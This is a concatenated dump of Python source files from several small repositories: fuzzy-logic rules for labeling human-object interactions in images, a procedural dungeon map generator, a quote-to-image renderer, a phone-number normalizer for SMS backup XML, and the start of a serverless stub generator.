using = fuzz.interp_membership(self.__device_interaction.universe, self.__device_interaction['Using'].mf,
using_result)
not_using = fuzz.interp_membership(self.__device_interaction.universe,
self.__device_interaction['Not Using'].mf, using_result)
membership = {'Using': using, 'Not Using': not_using}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Using':
return None
else:
return ret_label
def compute_interaction(self, label, dom_cat, sub_cat, giou, iou, sr_angle):
if label == 'tv' or label == 'tvmonitor':
res_label = self.compute_tv_interaction(giou, iou, sr_angle)
return res_label
elif label == 'cell_phone':
res_label = self.compute_cell_phone_interaction(giou, iou, sr_angle)
return res_label
else:
res_label = self.compute_device_interaction(giou, iou, sr_angle)
return res_label
```
#### File: scene_labeling/level_two_utils/food.py
```python
from skfuzzy import control as ctrl
import skfuzzy as fuzz
import numpy as np
from fuzzy_utils import create_universes_membership_functions
class FoodRules:
def __init__(self, show_sim_result=None):
prox, over, spat = create_universes_membership_functions()
self.__show_sim_result = show_sim_result
self.__proximity = prox
self.__overlap = over
self.__spatial_relationships = spat
self.__create_universes_of_discourse()
self.__create_membership_functions()
self.__create_using_rules()
self.__create_drinking_rules()
self.__create_eating_rules()
def __create_universes_of_discourse(self):
"""
Food categories break down into:
Used: utensils->plate, fork, knife, spoon, bowl
Drink: bottle, wine glass, cup
Eaten: banana, apple, sandwich, orange, broccoli, carrot, hot dog, pizza, donut, cake
"""
self.__using_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='using_interaction')
self.__drinking_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='drinking_interaction')
self.__eating_interaction = ctrl.Consequent(universe=np.arange(-0.1, 1.1, 0.1), label='eating_interaction')
def __create_membership_functions(self):
self.__using_interaction['Using'] = fuzz.trimf(self.__using_interaction.universe, [0.4, 0.7, 1.0])
self.__using_interaction['Not Using'] = fuzz.trimf(self.__using_interaction.universe, [0.0, 0.3, 0.6])
self.__drinking_interaction['Drinking'] = fuzz.trimf(self.__drinking_interaction.universe, [0.4, 0.7, 1.0])
self.__drinking_interaction['Not Drinking'] = fuzz.trimf(self.__drinking_interaction.universe, [0.0, 0.3, 0.6])
self.__eating_interaction['Eating'] = fuzz.trimf(self.__eating_interaction.universe, [0.4, 0.7, 1.0])
self.__eating_interaction['Not Eating'] = fuzz.trimf(self.__eating_interaction.universe, [0.0, 0.3, 0.6])
def __create_using_rules(self):
"""
These rules are for utensils, plates, bowls.
A person is only using a utensil if they overlap and are in very close proximity
"""
# IF overlap AND very close OR close THEN using
self.__using_rule = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__using_interaction['Using'])
# IF overlap AND medium OR far OR very far THEN not using
self.__not_using_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']), self.__using_interaction['Not Using'])
# IF no overlap THEN not using
self.__not_using_rule2 = ctrl.Rule(self.__overlap['No Overlap'], self.__using_interaction['Not Using'])
self.__using_ctrl = ctrl.ControlSystem([self.__using_rule, self.__not_using_rule1, self.__not_using_rule2])
self.__using_sim = ctrl.ControlSystemSimulation(self.__using_ctrl, flush_after_run=100)
def __create_drinking_rules(self):
"""
These rules are for person drinking from object.
A person is only drinking if they overlap the object and are in very close proximity.
Very strict rules, but avoids erroneous labels
"""
self.__drinking_rule = ctrl.Rule(self.__overlap['Overlap'] & self.__proximity['Very Close'],
self.__drinking_interaction['Drinking'])
self.__not_drinking_rule1 = ctrl.Rule(self.__overlap['No Overlap'], self.__drinking_interaction['Not Drinking'])
self.__not_drinking_rule2 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Close'] | self.__proximity['Medium'] |
self.__proximity['Far'] | self.__proximity['Very Far']),
self.__drinking_interaction['Not Drinking'])
self.__drinking_ctrl = ctrl.ControlSystem([self.__drinking_rule, self.__not_drinking_rule1,
self.__not_drinking_rule2])
self.__drinking_sim = ctrl.ControlSystemSimulation(self.__drinking_ctrl, flush_after_run=100)
def __create_eating_rules(self):
"""
These rules are for person eating food.
A person is only eating food if they overlap the food and are not below it
Starting with very strict rules. Overlap and very close entails eating. Everything else does not.
"""
# IF overlap AND very close THEN eating
self.__eating_rule = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__eating_interaction['Eating'])
# IF overlap AND close OR medium OR far OR very far THEN not eating
self.__not_eating_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']), self.__eating_interaction['Not Eating'])
# IF no overlap THEN not eating
self.__not_eating_rule2 = ctrl.Rule(self.__overlap['No Overlap'], self.__eating_interaction['Not Eating'])
self.__eating_ctrl = ctrl.ControlSystem([self.__eating_rule, self.__not_eating_rule1, self.__not_eating_rule2])
self.__eating_sim = ctrl.ControlSystemSimulation(self.__eating_ctrl, flush_after_run=100)
def compute_using_interaction(self, giou, iou, sr_angle):
self.__using_sim.input['proximity'] = giou
self.__using_sim.input['overlap'] = iou
self.__using_sim.compute()
using_result = self.__using_sim.output['using_interaction']
if self.__show_sim_result:
self.__using_interaction.view(sim=self.__using_sim)
using = fuzz.interp_membership(self.__using_interaction.universe, self.__using_interaction['Using'].mf,
using_result)
not_using = fuzz.interp_membership(self.__using_interaction.universe, self.__using_interaction['Not Using'].mf,
using_result)
membership = {'Using': using, 'Not Using': not_using}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Using':
return None
else:
return ret_label
def compute_drinking_interaction(self, giou, iou, sr_angle):
self.__drinking_sim.input['overlap'] = iou
self.__drinking_sim.input['proximity'] = giou
self.__drinking_sim.compute()
drinking_result = self.__drinking_sim.output['drinking_interaction']
if self.__show_sim_result:
self.__drinking_interaction.view(sim=self.__drinking_sim)
drinking = fuzz.interp_membership(self.__drinking_interaction.universe,
self.__drinking_interaction['Drinking'].mf, drinking_result)
not_drinking = fuzz.interp_membership(self.__drinking_interaction.universe,
self.__drinking_interaction['Not Drinking'].mf, drinking_result)
membership = {'Drinking': drinking, 'Not Drinking': not_drinking}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Drinking':
return None
else:
return ret_label
def compute_eating_interaction(self, giou, iou, sr_angle):
self.__eating_sim.input['proximity'] = giou
self.__eating_sim.input['overlap'] = iou
self.__eating_sim.compute()
eating_result = self.__eating_sim.output['eating_interaction']
if self.__show_sim_result:
self.__eating_interaction.view(sim=self.__eating_sim)
eating = fuzz.interp_membership(self.__eating_interaction.universe, self.__eating_interaction['Eating'].mf,
eating_result)
not_eating = fuzz.interp_membership(self.__eating_interaction.universe,
self.__eating_interaction['Not Eating'].mf, eating_result)
membership = {'Eating': eating, 'Not Eating': not_eating}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Eating':
return None
else:
return ret_label
def compute_interaction(self, label, dom_cat, sub_cat, giou, iou, sr_angle):
"""
Use the sub_cat to determine the appropriate simulation to call
"""
if sub_cat is not None and sub_cat == 'drink':
res_label = self.compute_drinking_interaction(giou, iou, sr_angle)
return res_label
if sub_cat is not None and sub_cat == 'eaten':
res_label = self.compute_eating_interaction(giou, iou, sr_angle)
return res_label
if sub_cat is not None and sub_cat == 'used':
res_label = self.compute_using_interaction(giou, iou, sr_angle)
return res_label
```
#### File: scene_labeling/level_two_utils/fuzzy_utils.py
```python
from skfuzzy import control as ctrl
import skfuzzy as fuzz
import numpy as np
def create_universes_membership_functions():
proximity = ctrl.Antecedent(universe=np.arange(-1.1, 1.1, 0.1), label='proximity')
overlap = ctrl.Antecedent(universe=np.arange(-1.1, 1.1, 0.1), label='overlap')
spatial_relationships = ctrl.Antecedent(universe=np.arange(-1, 361, 1), label='spatial_relationships')
proximity['Very Close'] = fuzz.trapmf(proximity.universe, [-0.1, 0.0, 0.3, 0.6])
proximity['Close'] = fuzz.trapmf(proximity.universe, [-0.35, -0.3, -0.05, 0.0])
proximity['Medium'] = fuzz.trapmf(proximity.universe, [-0.7, -0.5, -0.35, -0.25])
proximity['Far'] = fuzz.trapmf(proximity.universe, [-0.85, -0.75, -0.6, -0.5])
proximity['Very Far'] = fuzz.trapmf(proximity.universe, [-1.0, -0.95, -0.8, -0.75])
overlap['Overlap'] = fuzz.trapmf(overlap.universe, [0.0, 0.2, 0.7, 1.0])
overlap['No Overlap'] = fuzz.trapmf(overlap.universe, [-1.0, -0.7, -0.2, 0.0])
# 0 < HOF < 30 | 331 < HOF < 360: Right
spatial_relationships['Right1'] = fuzz.trimf(spatial_relationships.universe, [-1, 15, 31])
spatial_relationships['Right2'] = fuzz.trimf(spatial_relationships.universe, [330, 345, 360])
# 31 < HOF < 60: Above Right
spatial_relationships['Above Right'] = fuzz.trimf(spatial_relationships.universe, [30, 45, 61])
# 61 < HOF < 120: Above
spatial_relationships['Above'] = fuzz.trimf(spatial_relationships.universe, [60, 90, 121])
# 121 < HOF < 150: Above Left
spatial_relationships['Above Left'] = fuzz.trimf(spatial_relationships.universe, [120, 135, 151])
# 151 < HOF < 210: Left
spatial_relationships['Left'] = fuzz.trimf(spatial_relationships.universe, [150, 180, 211])
# 211 < HOF < 240: Below Left
spatial_relationships['Below Left'] = fuzz.trimf(spatial_relationships.universe, [210, 225, 241])
# 241 < HOF < 300: Below
spatial_relationships['Below'] = fuzz.trimf(spatial_relationships.universe, [240, 270, 301])
# 301 < HOF < 330: Below Right
spatial_relationships['Below Right'] = fuzz.trimf(spatial_relationships.universe, [300, 315, 331])
return proximity, overlap, spatial_relationships
```
#### File: scene_labeling/level_two_utils/general_rules.py
```python
from collections import defaultdict
from level_two_utils.fuzzy_utils import create_universes_membership_functions
import numpy as np
import skfuzzy as fuzz
from skfuzzy import control as ctrl
class GeneralRules:
def __init__(self):
self.__general_categories_lookup = defaultdict(list)
prox, over, spat = create_universes_membership_functions()
self.__proximity = prox
self.__overlap = over
self.__spatial_relationships = spat
self.__create_membership_functions()
self.__create_rules()
def __create_membership_functions(self):
"""
Construct the consequent membership function for the interaction fuzzy variable
:return:
"""
self.__interaction = ctrl.Consequent(universe=np.arange(-1.1, 1.1, 0.1), label='interaction')
self.__interaction['Interacting'] = fuzz.trimf(self.__interaction.universe, [0.0, 0.5, 1.0])
self.__interaction['Not Interacting'] = fuzz.trimf(self.__interaction.universe, [-1.0, -0.5, 0.0])
def __create_rules(self):
"""
Construct the rule base for the general categories
These rules simply indicate whether or not objects are interacting
:return:
"""
self.__interacting_rule_1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__interaction['Interacting'])
self.__interacting_rule_2 = ctrl.Rule(self.__overlap['No Overlap'] & self.__proximity['Very Close'],
self.__interaction['Not Interacting'])
self.__not_interacting_rule1 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Close'] | self.__proximity['Medium'] |
self.__proximity['Far'] | self.__proximity['Very Far']),
self.__interaction['Not Interacting'])
self.__not_interacting_rule2 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']), self.__interaction['Not Interacting'])
self.__interaction_ctrl = ctrl.ControlSystem([self.__interacting_rule_1, self.__interacting_rule_2,
self.__not_interacting_rule1, self.__not_interacting_rule2])
self.__interaction_sim = ctrl.ControlSystemSimulation(self.__interaction_ctrl, flush_after_run=100)
def compute_interactions(self, giou_score=None, iou_score=None):
self.__interaction_sim.input['proximity'] = giou_score
self.__interaction_sim.input['overlap'] = iou_score
self.__interaction_sim.compute()
interaction = self.__interaction_sim.output['interaction']
interacting = fuzz.interp_membership(self.__interaction.universe, self.__interaction['Interacting'].mf,
interaction)
not_interacting = fuzz.interp_membership(self.__interaction.universe, self.__interaction['Not Interacting'].mf,
interaction)
membership = {'Interacting': interacting, 'Not Interacting': not_interacting}
interacting_label = max(membership, key=membership.get)
return interacting_label
```
#### File: scene_labeling/visualizations/visualize_hof.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pathlib import Path
HIST_DIR = './hist_vis/'
PLOTTING_FILE = './hist_vis/person_1_tie_1_hists.csv'
IMG_OUTPUT_FILE = './hist_vis/tie_hof.png'
def main():
# filepath = Path(HIST_DIR).glob('**/*')
# hist_files = [x for x in filepath if x.is_file()]
# The membership function lines to plot
left_x = [120, 180, 240]
left_y = [0, 100, 0]
below_x = [210, 270, 330]
below_y = [0, 100, 0]
above_x = [30, 90, 150]
above_y = [0, 100, 0]
right1_x = [0, 30, 60]
right1_y = [0, 100, 0]
right2_x = [300, 330, 360]
right2_y = [0, 100, 0]
df = pd.read_csv(PLOTTING_FILE, encoding='utf-8', engine='python')
magnitude = list(df['hyb_magnitude'])
fig, ax = plt.subplots(dpi=300)
ax.plot(left_x, left_y, color='red', label='left', alpha=0.5)
plt.fill_between(left_x, left_y, color='red', alpha=0.5)
ax.plot(below_x, below_y, color='green', label='below', alpha=0.5)
plt.fill_between(below_x, below_y, color='green', alpha=0.5)
ax.plot(above_x, above_y, color='blueviolet', label='above', alpha=0.5)
plt.fill_between(above_x, above_y, color='blueviolet', alpha=0.5)
ax.plot(right1_x, right1_y, color='darkorange', label='right', alpha=0.5)
plt.fill_between(right1_x, right1_y, color='darkorange', alpha=0.5)
ax.plot(right2_x, right2_y, color='darkorange', alpha=0.5)
plt.fill_between(right2_x, right2_y, color='darkorange', alpha=0.5)
ax.bar(np.arange(361), magnitude, color='blue')
ax.set_xticks(np.arange(0, 361, 45))
plt.legend(loc='upper right')
plt.xlabel('Degrees')
plt.ylabel('Normalized Magnitude')
plt.savefig(IMG_OUTPUT_FILE)
plt.show()
if __name__ == '__main__':
main()
```
#### File: scene_labeling/visualizations/visualize_level_one_summaries.py
```python
import pandas as pd
import cv2
import json
import numpy as np
import os
INPUT_IMAGES_DIR = '../input/coco_images/'
LEVEL_ONE_SUMMARIES_FILE = '../output/level_one_summaries.csv'
# Store the level one summary images of interest
OUTPUT_DIR = '../input/image_results/level_one/'
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
COLORS = [
[255, 0, 0],
[0, 255, 0],
[0, 0, 255],
[255, 255, 255]
]
def convert_box(json_box):
box = np.array(json.loads(json_box))
return [int(box[0]), int(box[1]), int(box[2]), int(box[3])]
def draw_img_results(img, boxes, labels):
clone = img.copy()
i_color = 0
for b, l in zip(boxes, labels):
color = COLORS[i_color]
i_color += 1
if i_color > 3:
i_color = 0
cv2.rectangle(clone, (b[0], b[1]), (b[2], b[3]), color, 2)
if b[0] - 10 < 0:
l_x = b[0] + 10
else:
l_x = b[0] + 20
if b[1] - 20 < 0:
l_y = b[1] + 20
else:
l_y = b[1] - 10
cv2.putText(clone, l, (l_x, l_y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, color, 2)
return clone
def main():
l1_df = pd.read_csv(LEVEL_ONE_SUMMARIES_FILE, encoding='utf-8', engine='python')
img_paths = list(l1_df['relative_path'].unique())
for p in img_paths:
img_df = l1_df.loc[l1_df['relative_path'] == p]
img_path = INPUT_IMAGES_DIR + p
orig_img = cv2.imread(img_path, cv2.IMREAD_COLOR)
boxes = []
labels = []
l1_summaries = []
for idx, row in img_df.iterrows():
arg_label = row['arg_label']
if not arg_label in labels:
labels.append(arg_label)
boxes.append(convert_box(row['arg_bounding_box']))
ref_label = row['ref_label']
if not ref_label in labels:
labels.append(ref_label)
boxes.append(convert_box(row['ref_bounding_box']))
l1_summary = row['level_one_summary']
if not l1_summary in l1_summaries:
l1_summaries.append(row['level_one_summary'])
result_img = draw_img_results(orig_img, boxes, labels)
for l in l1_summaries:
print(l)
print()
cv2.imshow('Level One Summaries', result_img)
in_key = cv2.waitKey(0)
# If 's' is pressed, store the image to the output directory
if in_key == ord('s'):
output_path = OUTPUT_DIR + p
cv2.imwrite(output_path, result_img)
if __name__ == '__main__':
main()
```
|
{
"source": "jedavis-rpg/dungeonmap",
"score": 3
}
|
#### File: jedavis-rpg/dungeonmap/level.py
```python
import random
from PIL import Image, ImageDraw, ImageColor
from adjpair import AdjPair
from border import Border
from loop import Loop
from room import Room
from unionfinder import UnionFinder
ANIMATE = True
class Level(object):
def __init__(self, width=25, height=25):
self.width = width
self.height = height
walls = {}
for x in range(0, width):
for y in range(0, height):
if x != width-1:
p1 = [(x,y),(x+1,y)]
walls[AdjPair((x,y),(x+1,y))] = Border.WALL
if y != height - 1:
p2 = [(x,y),(x,y+1)]
walls[AdjPair((x,y),(x,y+1))] = Border.WALL
self.walls = walls
self.uf = UnionFinder(width, height)
self.rooms = []
self.loops = []
self.frames = []
def add_room(self, r):
for ap in r.all_adjpairs():
self.walls[ap] = Border.EMPTY
self.uf.union(ap.t1, ap.t2)
self.rooms.append(r)
def gen_random_rooms(self, room_frac=0.5):
room_dim_dist = [2, 2, 3, 3, 3, 4, 4, 5]
total_room_area = 0
while total_room_area / (self.width * self.height) < room_frac:
rand_corner = (random.randint(0, self.width-2), random.randint(0, self.height-2))
rand_width = random.choice(room_dim_dist)
if rand_corner[0] + rand_width >= self.width:
rand_width = self.width - rand_corner[0]
rand_height = random.choice(room_dim_dist)
if rand_corner[1] + rand_height >= self.height:
rand_height = self.height - rand_corner[1]
cand = Room(rand_corner, rand_width, rand_height)
# no overlapping rooms, only roomify leaderless areas
rejected = False
for t in cand.all_tiles():
if self.uf.ranks[t] != 0 or self.uf.find(t) != t:
rejected = True
if not rejected:
self.add_room(cand)
total_room_area += rand_height * rand_width
self.append_frame()
def add_loop(self, l):
for ap in l.all_adjpairs():
# TODO sometimes place a secret door instead
# once I have tech for actually drawing secret doors
self.walls[ap] = Border.EMPTY
self.uf.union(ap.t1, ap.t2)
self.loops.append(l)
def gen_random_loops(self, num_loops = 7):
loop_dim_dist = [6, 6, 7, 7, 8, 9, 10]
for i in range(num_loops):
rand_corner = (random.randint(0, self.width-3), random.randint(0, self.height-3))
rand_width = random.choice(loop_dim_dist)
if rand_corner[0] + rand_width >= self.width:
rand_width = self.width - rand_corner[0]
rand_height = random.choice(loop_dim_dist)
if rand_corner[1] + rand_height >= self.height:
rand_height = self.height - rand_corner[1]
cand = Loop(rand_corner, rand_width, rand_height)
self.add_loop(cand)
self.append_frame()
def uf_maze(self):
walls_list = [k for (k,v) in self.walls.items() if v == Border.WALL]
random.shuffle(walls_list)
i = 0
for w in walls_list:
if not self.uf.check_connected(w.t1, w.t2):
self.walls[w] = Border.EMPTY
self.uf.union(w.t1, w.t2)
i+=1
if i % 10 == 0:
self.append_frame()
def draw_border(self, draw, px_per_tile):
max_x = px_per_tile * self.width - 1
max_y = px_per_tile * self.height - 2
corners = [(0,1),(0,max_y),(max_x,max_y),(max_x,1),(0,1)]
draw.line(corners, ImageColor.getrgb("black"), 2)
def draw_frame(self, px_per_tile=20):
im = Image.new('RGB', (self.width * px_per_tile, self.height * px_per_tile), ImageColor.getrgb("white"))
draw = ImageDraw.Draw(im)
for coords, bord in self.walls.items():
wall_coords = coords.get_wall_coords(px_per_tile)
color = (0, 128, 256) # dim light blue
width = 1
if bord == Border.WALL:
width = 3
color = ImageColor.getrgb("black")
draw.line(wall_coords, color, width)
self.draw_border(draw, px_per_tile)
return im
def append_frame(self):
if ANIMATE:
self.frames.append(self.draw_frame())
def draw(self, outpath, px_per_tile=20):
self.frames.append(self.draw_frame(px_per_tile))
if outpath.endswith(".gif"):
self.frames[0].save(outpath, save_all=True, append_images=self.frames[1:] + [self.frames[-1]]*40, duration=100, loop=0)
else:
self.frames[-1].save(outpath)
if __name__ == "__main__":
l = Level()
l.gen_random_rooms()
l.gen_random_loops()
l.uf_maze()
if ANIMATE:
l.draw("./test.gif")
else:
l.draw("./test.jpg")
```
#### File: jedavis-rpg/dungeonmap/unionfinder.py
```python
class UnionFinder(object):
def __init__(self, width, height):
self.leaders = {}
self.ranks = {}
for t in [(x,y) for x in range (width) for y in range(height)]:
self.leaders[t] = t
self.ranks[t] = 0
# Finds the leader of t's connected component and returns it
# Updates leader state of all intermediate tiles
def find(self, t):
if t not in self.leaders:
raise ValueError("Attempting to find leader for unknown tile %s" % (t,))
curr = t
to_update = set()
while self.leaders[curr] != curr:
to_update.add(curr)
curr = self.leaders[curr]
for u in to_update:
self.leaders[u] = curr
return curr
def check_connected(self, t1, t2):
l1 = self.find(t1)
l2 = self.find(t2)
return l1 == l2
# Perform union-by-rank
def union(self, t1, t2):
l1 = self.find(t1)
l2 = self.find(t2)
if l1 == l2:
return
r1 = self.ranks[l1]
r2 = self.ranks[l2]
if r1 > r2:
self.leaders[l2] = l1
elif r1 < r2:
self.leaders[l1] = l2
else:
self.leaders[l2] = l1
self.ranks[l1] += 1
```
|
{
"source": "jedav/mototron",
"score": 3
}
|
#### File: jedav/mototron/motofortune.py
```python
from PIL import Image, ImageDraw, ImageFont, ImageColor
import sys
import os
SCREENSIZE = (1600, 900)
def put_text_in_box(draw, text, topleft, botright):
# iteratively decrease font size until it fits
# text is already assumed to have newlines and formatting
fontsize = 68
height = botright[1] - topleft[1]
width = botright[0] - topleft[0]
txtcolor = ImageColor.getrgb("white")
while fontsize > 10:
font = ImageFont.truetype("/usr/share/fonts/truetype/msttcorefonts/times.ttf", size=fontsize)
assert font
(x,y) = draw.multiline_textsize(text, font=font)
if x > width or y > height:
fontsize -= 4
else:
# time to center
xslack = width - x
yslack = height - y
topcoord = (topleft[0]+int(xslack / 2), topleft[1] + int(yslack / 2))
draw.multiline_text(topcoord, text, txtcolor, font)
return
print("could not fit %s into given box" % text)
raise ValueError
def render(quote, idx, outdir):
img = Image.new("RGB", SCREENSIZE) # default to black background
draw = ImageDraw.Draw(img) # jesus who named these functions?
put_text_in_box(draw, "%s" % quote, (100, 100), (1500, 800))
img.save(os.path.join(outdir, "%d.jpg" % idx))
def main():
if len(sys.argv) < 3:
print("usage: %s path/to/quotes path/to/outdir" % sys.argv[0])
exit(1)
assert os.path.isfile(sys.argv[1])
assert os.path.isdir(sys.argv[2])
lines = open(sys.argv[1]).read().split("\n")
quote = ""
count = 0
for i in range(len(lines)):
if lines[i].rstrip() == "%":
try:
render(quote.rstrip(), count, sys.argv[2])
count += 1
except ValueError:
pass
quote = ""
else:
quote += lines[i]+"\n"
if __name__ == "__main__":
main()
```
|
{
"source": "jedav/normalize_mms",
"score": 4
}
|
#### File: jedav/normalize_mms/normalize_addresses.py
```python
import defusedxml.ElementTree as ET
import re
import sys
# regular expression for finding things that look like international phone numbers
# developed from a handful of examples rather than the RFCs, so... works generally, could miss edge cases
PHONE_RE = re.compile(r"^(?:00[ -]?|\+?)(\d{0,3}?)[ -]?\(?(\d{3})\)?[ -]?(\d{3})[ -]?(\d{4})$")
# names of groups extracted by regex, by position
RE_PARTS = ["country", "area", "first", "last"]
# XML XPATH expression for finding nodes that have "address" attributes
ADDR_XPATH = ".//*[@address]"
class AddrData(object):
def __init__(self, addrdict):
self.canon = addrdict["first"]+addrdict["last"]
self.area = addrdict["area"]
if not len(self.area):
self.area = None
self.country = addrdict["country"]
if not len(self.country):
self.country = None
def update(self, other):
assert self.canon == other.canon
if other.country is not None:
if self.country is None:
self.country = other.country
assert self.country == other.country
if other.area is not None:
if self.area is None:
self.area = other.area
assert self.area == other.area
def __str__(self):
out = ""
if self.country:
out += "+"+self.country
if self.area:
out += self.area
out += self.canon
return out
# functions for gathering addresses
def add_addr(addrmap, addr):
match = PHONE_RE.match(addr)
if match is None:
return
parts = dict(zip(RE_PARTS, match.groups()))
canon = parts["first"] + parts["last"]
if canon in addrmap:
new_addr = AddrData(parts)
addrmap[canon].update(new_addr)
else:
addrmap[canon] = AddrData(parts)
def gather_addrs(root):
# here we look for multiple versions of the same address, some of which might have more information than others
# to make sure that when we canonicalize addresses, we do so correctly
# (rather than assuming, eg, that all addresses with unspecified country codes are USA)
addrmap = {}
addrs = [e.get("address") for e in root.findall(ADDR_XPATH)]
for addr in addrs:
if '~' in addr:
parts = addr.split('~')
for part in parts:
add_addr(addrmap, part)
else:
add_addr(addrmap, addr)
return addrmap
# functions for outputting normalized addresses
def normalize_addr(addrmap, addr):
match = PHONE_RE.match(addr)
if match is None:
return addr
parts = dict(zip(RE_PARTS, match.groups()))
canon = parts["first"] + parts["last"]
assert canon in addrmap
return str(addrmap[canon])
def update_addrs(root, addrmap):
nodes = root.findall(ADDR_XPATH)
for node in nodes:
address = node.get("address")
if '~' in address:
addresses = address.split('~')
else:
addresses = [address]
addresses = [normalize_addr(addrmap, addr) for addr in addresses]
address = '~'.join(addresses)
node.set("address", address)
def parse_args():
if len(sys.argv) < 2:
print "USAGE: %s path/to/input/db.xml [path/to/output/db.xml]"%sys.argv[0]
sys.exit(-1)
inpath = sys.argv[1]
if len(sys.argv) >= 3:
outpath = sys.argv[2]
else:
inpath_parts = inpath.split('.')
inpath_suffix = inpath_parts[-1]
inpath_prefix = '.'.join(inpath_parts[:-1])
outpath = inpath_prefix+"-compressed."+inpath_suffix
return (inpath, outpath)
def main():
(inpath, outpath) = parse_args()
tree = ET.parse(inpath, forbid_dtd=True)
root = tree.getroot()
addrmap = gather_addrs(root)
update_addrs(root, addrmap)
tree.write(outpath)
if __name__ == "__main__":
main()
```
|
{
"source": "JeDaYoshi/lykos",
"score": 2
}
|
#### File: src/gamemodes/random.py
```python
import random
from collections import defaultdict
from src.gamemodes import game_mode, GameMode, InvalidModeException
from src.messages import messages
from src.events import EventListener
from src import channels, users
from src.cats import All, Wolf, Killer
@game_mode("random", minp=8, maxp=24, likelihood=0)
class RandomMode(GameMode):
"""Completely random and hidden roles."""
def __init__(self, arg=""):
self.ROLE_REVEAL = random.choice(("on", "off", "team"))
self.STATS_TYPE = "disabled" if self.ROLE_REVEAL == "off" else random.choice(("disabled", "team"))
super().__init__(arg)
for role in self.SECONDARY_ROLES:
self.SECONDARY_ROLES[role] = All
self.TOTEM_CHANCES = {
"death" : {"shaman": 8, "wolf shaman": 1},
"protection" : {"shaman": 6, "wolf shaman": 6},
"silence" : {"shaman": 4, "wolf shaman": 3},
"revealing" : {"shaman": 2, "wolf shaman": 5},
"desperation" : {"shaman": 4, "wolf shaman": 7},
"impatience" : {"shaman": 7, "wolf shaman": 2},
"pacifism" : {"shaman": 7, "wolf shaman": 2},
"influence" : {"shaman": 7, "wolf shaman": 2},
"narcolepsy" : {"shaman": 4, "wolf shaman": 3},
"exchange" : {"shaman": 1, "wolf shaman": 1},
"lycanthropy" : {"shaman": 1, "wolf shaman": 3},
"luck" : {"shaman": 6, "wolf shaman": 7},
"pestilence" : {"shaman": 3, "wolf shaman": 1},
"retribution" : {"shaman": 5, "wolf shaman": 6},
"misdirection" : {"shaman": 6, "wolf shaman": 4},
"deceit" : {"shaman": 3, "wolf shaman": 6},
}
self.ROLE_SETS["gunner/sharpshooter"] = {"gunner": 8, "sharpshooter": 4}
self.set_default_totem_chances()
self.EVENTS = {
"role_attribution": EventListener(self.role_attribution),
"chK_win": EventListener(self.lovers_chk_win)
}
def role_attribution(self, evt, var, chk_win_conditions, villagers):
lpl = len(villagers) - 1
addroles = evt.data["addroles"]
addroles[random.choice(list(Wolf & Killer))] += 1 # make sure there's at least one wolf role
roles = list(All - self.SECONDARY_ROLES.keys() - {"villager", "cultist", "amnesiac"})
while lpl:
addroles[random.choice(roles)] += 1
lpl -= 1
addroles["gunner/sharpshooter"] = random.randrange(int(len(villagers) ** 1.2 / 4))
addroles["assassin"] = random.randrange(max(int(len(villagers) ** 1.2 / 8), 1))
rolemap = defaultdict(set)
mainroles = {}
i = 0
for role, count in addroles.items():
if count > 0:
for j in range(count):
u = users.FakeUser.from_nick(str(i + j))
rolemap[role].add(u.nick)
if role not in self.SECONDARY_ROLES:
mainroles[u] = role
i += count
if chk_win_conditions(rolemap, mainroles, end_game=False):
return self.role_attribution(evt, var, chk_win_conditions, villagers)
evt.prevent_default = True
```
#### File: src/roles/insomniac.py
```python
from src.functions import get_players, get_all_players, get_all_roles
from src.decorators import event_listener
from src.messages import messages
from src.cats import Nocturnal
def _get_targets(var, pl, user):
index = var.ALL_PLAYERS.index(user)
num_players = len(var.ALL_PLAYERS)
# determine left player
i = index
while True:
i = (i - 1) % num_players
if var.ALL_PLAYERS[i] in pl or var.ALL_PLAYERS[i] is user:
target1 = var.ALL_PLAYERS[i]
break
# determine right player
i = index
while True:
i = (i + 1) % num_players
if var.ALL_PLAYERS[i] in pl or var.ALL_PLAYERS[i] is user:
target2 = var.ALL_PLAYERS[i]
break
return (target1, target2)
@event_listener("transition_night_end")
def on_transition_night_end(evt, var):
if var.NIGHT_COUNT == 1 or var.ALWAYS_PM_ROLE:
for insomniac in get_all_players(("insomniac",)):
insomniac.send(messages["insomniac_notify"])
@event_listener("transition_day_begin")
def on_transition_day_begin(evt, var):
pl = get_players()
for insomniac in get_all_players(("insomniac",)):
p1, p2 = _get_targets(var, pl, insomniac)
p1_roles = get_all_roles(p1)
p2_roles = get_all_roles(p2)
if p1_roles & Nocturnal or p2_roles & Nocturnal:
# one or both of the players next to the insomniac were awake last night
insomniac.send(messages["insomniac_awake"].format(p1, p2))
else:
# both players next to the insomniac were asleep all night
insomniac.send(messages["insomniac_asleep"].format(p1, p2))
@event_listener("get_role_metadata")
def on_get_role_metadata(evt, var, kind):
if kind == "role_categories":
evt.data["insomniac"] = {"Village", "Nocturnal"}
```
|
{
"source": "jedberg/serverless-framework-tools",
"score": 3
}
|
#### File: jedberg/serverless-framework-tools/stub-functions.py
```python
import ast
import os
import yaml
def stub_out(func, file):
"""This function creates the default function stubs"""
with open(file, "a") as myfile:
text = """def %s(event, context):
response = dict(statusCode=501, body="")
return response
""" % (func)
myfile.write(text)
# Read in the serverless.yml file and find all the functions and files that should exist
f = ""
with open("serverless.yml", 'r') as stream:
f = yaml.full_load(stream)
